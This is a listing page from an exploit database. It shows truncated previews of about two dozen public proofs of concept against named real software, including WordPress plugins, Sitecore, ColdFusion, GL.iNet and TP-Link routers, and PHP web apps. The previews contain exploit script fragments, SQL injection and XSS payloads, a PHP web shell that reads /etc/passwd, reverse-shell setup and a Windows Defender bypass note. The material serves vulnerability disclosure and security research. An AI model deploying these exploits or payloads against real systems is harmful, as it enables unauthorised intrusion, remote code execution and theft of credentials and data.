?day POC 漏洞数据库

# Exploit Title: Human Resource Management System - SQL Injection # Date: 13-01-2024 # Exploit Author: Srikar ( Exp1o1t9r ) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 # Vulnerable URL and Parameter:URL: Parameter: employeeid=2 The following payloads …

#!/usr/bin/env python3 # # Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2024-01-08 # Vendor Homepage: https://www.sitecore.com/ # Software Link: https://dev.sitecore.net/ # Version: 10.3 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813 # The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted # Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09 # Video POC : https://youtu.be/vWKl9wgdTB0 import argparse import requests from …

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360 # Google Dork: [not] # Date: [12/28/2023] # Exploit Author: [Youssef Muhammad] # Vendor Homepage: [ https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html] # Software Link: [ https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0] # Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier] # Tested on: [Windows, Linux] # CVE : [CVE-2023-26360] import sys import requests import json BANNER = """ ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ██ ██ ██ ██ ██ ████…

# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:("plugins/duplicator/") # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free # Software Link: https://wordpress.org/plugins/duplicator/ # Version: 1.5.7.1 # Tested on: Wordpress 6.4 # CVE : CVE-2023-6114# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ # CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A severe vulner…

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and at…

#!/usr/bin/python3 # # Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE: CVE-2023-5808 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from datetime import datetime from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-5808 PoC", usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: pa…

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request …

# Exploit Title: Akaunting < 3.1.3 - RCE # Date: 08/02/2024 # Exploit Author: [email protected] # Vendor Homepage: https://akaunting.com # Software Link: https://github.com/akaunting/akaunting # Version: <= 3.1.3 # Tested on: Ubuntu (22.04) # CVE : CVE-2024-22836 #!/usr/bin/python3 import sys import re import requests import argparse def get_company(): # print("[INF] Retrieving company id...") res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False) if res.status_code != 302: print("[ERR] No company id was found!") sys.exit(3) cid = res.headers['Location'].split('/')[-1] if cid == "login": print("[ERR] Invalid session cookie!") …

# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF) # Date: 2024-01-20 # Exploit Author: @_chebuya # Software Link: https://github.com/everywall/ladder # Version: v0.0.1 - v0.0.21 # Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0) # CVE: CVE-2024-27620 # Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs import requests import json target_url = "http://127.0.0.1:8080/api/…

# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE' # Date: 7/28/2022 # Exploit Author: Samy Younsi - NS Labs (https://neroteam.com) # Vendor Homepage: https://www.f-logic.jp # Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf # Version: Ver1.0 # Tested on: DataCube3 version 1.0 (Ubuntu) # CVE : CVE-2024-25830 + CVE-2024-25832 # Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 import re urllib3.disable_warnings(…

# Exploit Title: Numbas < v7.3 - Remote Code Execution # Google Dork: N/A # Date: March 7th, 2024 # Exploit Author: Matheus Boschetti # Vendor Homepage: https://www.numbas.org.uk/ # Software Link: https://github.com/numbas/Numbas # Version: 7.2 and below # Tested on: Linux # CVE: CVE-2024-27612 import sys, requests, re, argparse, subprocess, time from bs4 import BeautifulSoup s = requests.session() def getCSRF(target): url = f"http://{target}/" req = s.get(url) soup = BeautifulSoup(req.text, 'html.parser') csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value'] return csrfmiddlewaretoken def createTheme(target): …

# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS' # Date: 8/12/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router. #Usage: #python3 target username password #change port, if required ------------------------------------------------POC-------------------------------------…

DZONERZY Security Research GLiNet: Router Authentication Bypass ======================================================================== Contents ======================================================================== 1. Overview 2. Detailed Description 3. Exploit 4. Timeline ======================================================================== 1. Overview ======================================================================== CVE-2023-46453 is a remote authentication bypass vulnerability in the web interface of GLiNet routers running firmware versions 4.x and up. The vulnerability allows an attacker to bypass authentication and gain access to the router's web i…

# Exploit Title: elFinder Web file manager Version: 2.1.53 Remote Command Execution # Date: 23/11/2023 # Exploit Author: tmrswrr # Google Dork: intitle:"elFinder 2.1.53" # Vendor Homepage: https://studio-42.github.io/elFinder/ # Software Link: https://github.com/Studio-42/elFinder/archive/refs/tags/2.1.53.zip # Version: 2.1.53 # Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS 1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/admin/filemanager 2 ) Click Template Main and upload this test.php file : <?php echo system('cat /etc/passwd'); ?> 3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php root:x:0:0:…

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution # Date: 17/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download # Version: Version 1.3.0 # Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS import os import zipfile from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.firefox.options import Options as FirefoxOptions from selenium.webdriver.firefox.service import Service as FirefoxService from webdriver_manager.firefox import GeckoDriverManager from selenium.webdriver.support…

# Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- ----------------------------------------------------------------------------------------------------------…

# Exploit Title: Customer Support System 1.0 - Multiple SQL injection vulnerabilities # Date: 15/12/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-50071 *Description*: Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, cust…

# Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- --------------------------------------------------------------------------------------------------…

# Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via Race Condition # Google Dork: inurl:/wp-content/plugins/kk-star-ratings/ # Date: 2023-11-06 # Exploit Author: Mohammad Reza Omrani # Vendor Homepage: https://github.com/kamalkhan # Software Link: https://wordpress.org/plugins/kk-star-ratings/ # WPScan : https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/ # Version: 5.4.6 # Tested on: Wordpress 6.2.2 # CVE : CVE-2023-4642 # POC: 1- Install and activate kk Star Ratings. 2- Go to the page that displays the star rating. 3- Using Burp and the Turbo Intruder extension, intercept the rating submission. 4- Send the request to Turbo Intruder usi…

# Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS) # Date: 2023-11-15 # Exploit Author: Eren Car # Vendor Homepage: https://www.eralion.com/ # Software Link: https://downloads.wordpress.org/plugin/neon-text.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.4.1 # CVE : CVE-2023-5817 # 1. Description: The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the posts page and create new post. c. Add shorcode block and …

# Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel # Date: 10-30-23 # Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security # Vendor Homepage: https://www.solar-log.com/en/ # Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019 # Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/ # CVE: CVE-2023-46344 # POC: 1. Go to solar panel 2. Go to configuration -> Smart Energy -> "drag & drop" button. 3. Change "name" to: <xss onmouseenter="alert(document.cookie)" style=display:block>test</xss> 4. Once you hover over "test", you get XSS -> if a higher privileged user hovers over it, we can get their coo…

# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution # Date: 30-11-2023 # Exploit Author: Melvin Mejia # Vendor Homepage: https://jpylypiw.github.io/easywall/ # Software Link: https://github.com/jpylypiw/easywall # Version: 0.3.1 # Tested on: Ubuntu 22.04 import requests, json, urllib3 urllib3.disable_warnings() def exploit(): # Replace values needed here target_host = "192.168.1.25" target_port= "12227" lhost = "192.168.1.10" lport = "9001" user = "admin" password = "admin" target = f"https://{target_host}:{target_port}" # Authenticate to the app print("[+] Attempting login with the provided credent…

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vendor: R Radio Network Product web page: http://www.pktc.ac.th Affected version: 1.07 Summary: R Radio FM Transmitter that includes FM Exciter and FM Amplifier parameter setup. Desc: The transmitter suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access. Tested on: CSBtechDevice Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5802 Advisory URL: https…

#!/usr/bin/env python3 # Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client # Google Dork: intitle:"GL.iNet Admin Panel" # Date: XX/11/2023 # Exploit Author: Michele 'cyberaz0r' Di Bonaventura # Vendor Homepage: https://www.gli-net.com # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar # Version: 3.216 # Tested on: GL.iNet AR300M # CVE: CVE-2023-46456 import socket import requests import readline from time import sleep from random import randint from sys import stdout, argv from threading import Thread requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRe…

#!/usr/bin/env python # -*- coding: utf-8 -*- # # # TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution # # # Vendor: AAF Digital HD Forum | Atelmo GmbH # Product web page: http://www.aaf-digital.info | https://www.atemio.de # Affected version: Firmware <=2.01 # # Summary: The Atemio AM 520 HD Full HD satellite receiver enables the # reception of digital satellite programs in overwhelming image quality # in both SD and HD ranges. In addition to numerous connections, the small # all-rounder offers a variety of plugins that can be easily installed # thanks to the large flash memory. The TitanNit Linux software used combines # the advantages of the existing…